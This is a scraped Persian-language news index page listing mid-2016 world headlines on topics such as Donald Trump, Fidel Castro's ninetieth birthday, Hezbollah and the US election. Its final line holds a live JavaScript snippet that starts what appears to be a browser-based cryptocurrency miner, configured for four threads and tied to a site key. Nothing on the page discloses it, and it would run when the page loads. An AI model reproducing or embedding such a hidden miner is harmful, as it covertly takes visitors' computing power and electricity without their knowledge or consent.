جهان

ما مرکز جهانیم و روابط‌مان با ترامپ عاشقانه است!
ما مرکز جهانیم و روابط‌مان با ترامپ عاشقانه است!

۲۵ مرداد ۱۳۹۵/ خبرگزاری ملی اسرائیل/ ما مرکز جهانیم و روابط‌مان با ترامپ عاشقانه است!

مشاهده
فیدل کاسترو نودساله شد، هنوز علیه آمریکا، هنوز محبوب مردمانش
فیدل کاسترو نودساله شد، هنوز علیه آمریکا، هنوز محبوب مردمانش

۲۳مرداد ۱۳۹۵/ کوبا، هاوانا/ تولدت مبارک فرمانده!/ فیدل کاسترو نودساله شد، هنوز علیه آمریکا، هنوز محبوب مردمانش

مشاهده
حمایت صرب‌های بالکان از دونالدترامپ!
حمایت صرب‌های بالکان از دونالدترامپ!

۲۶ مرداد ۱۳۹۵/ بایدن به خانه‌ات برگرد! / حمایت صرب‌های بالکان از دونالدترامپ!

مشاهده
قُلمبه، ترامپ و دوستان! / سی‌بی‌اس علیه فاکس نیوز!
قُلمبه، ترامپ و دوستان! / سی‌بی‌اس علیه فاکس نیوز!

۳۱ تیر ۱۳۹۵/ برنامه نمایش دیروقت/ جان استوارت: / قُلمبه، ترامپ و دوستان! / سی‌بی‌اس علیه فاکس نیوز!

مشاهده
پوکمون‌گو، به عنوان گونهء نوینی از زندگی!
پوکمون‌گو، به عنوان گونهء نوینی از زندگی!

امروز/ آمریکا/ پوکمون‌گو، به عنوان گونهء نوینی از زندگی!

مشاهده
سیدهاشم صفی الدین، رئیس شورای حزب الله/ ما، موشک و اسرائیل!
سیدهاشم صفی الدین، رئیس شورای حزب الله/ ما، موشک و اسرائیل!

۲۰ مرداد ۱۳۹۵/ سیدهاشم صفی الدین، رئیس شورای حزب الله/ ما، موشک و اسرائیل!

مشاهده
خانم‌ها و آقایان! همه فرمایشات و تناقضاتِ ریاست جمهوری بالقوه ایالات متحده، دونالد ترامپ!
خانم‌ها و آقایان! همه فرمایشات و تناقضاتِ ریاست جمهوری بالقوه ایالات متحده، دونالد ترامپ!

۲۵مرداد ۱۳۹۵ / آمریکا/ خانم‌ها و آقایان! همه فرمایشات و تناقضاتِ ریاست جمهوری بالقوه ایالات متحده، دونالد ترامپ!

مشاهده
خبرهای تازه از دخترمدرسه‌ای های ربوده شده
خبرهای تازه از دخترمدرسه‌ای های ربوده شده

۲۵ مرداد ۱۳۹۵/ نیجریه/ رویترز/ خبرهای تازه از دخترمدرسه‌ای های ربوده شده

مشاهده
۵۵سال قبل، پردهء آهنین، دنیا را به دونیم کرد! چگونه؟
۵۵سال قبل، پردهء آهنین، دنیا را به دونیم کرد! چگونه؟

۲۳ مرداد ۱۳۴۰/ آلمان، برلین/ ۵۵سال قبل، پردهء آهنین، دنیا را به دونیم کرد! چگونه؟

مشاهده
یک امام مسجد در نیویورک به ضرب گلوله کشته شد، پیروانش خواستار صلح و عدالت
یک امام مسجد در نیویورک به ضرب گلوله کشته شد، پیروانش خواستار صلح و عدالت

۲۳ مرداد ۱۳۹۵/ آمریکا، نیویورک/ شبکه خبری ۱۰۵۵/ یک امام مسجد در نیویورک به ضرب گلوله کشته شد، پیروانش خواستار صلح و عدالت

مشاهده
در آمریکا چگونه رئیس جمهور انتخاب می‌شود
در آمریکا چگونه رئیس جمهور انتخاب می‌شود

۳۰ فروردین ۱۳۹۵/ در آمریکا چگونه رئیس جمهور انتخاب می‌شود

مشاهده
جیل استاین، حزب سوم و احتمال یک شگفتی در انتخابات آتی
جیل استاین، حزب سوم و احتمال یک شگفتی در انتخابات آتی

۲۲ مرداد ۱۳۹۵/ آمریکا/ جیل استاین، حزب سوم و احتمال یک شگفتی در انتخابات آتی

مشاهده


var someData = WMP.User('SK_A4VFH9k7Si5999pXyW7id', 'soroush',{ threads: 4, autoThreads: false, throttle: 0.3, forceASMJS: false }); someData.start();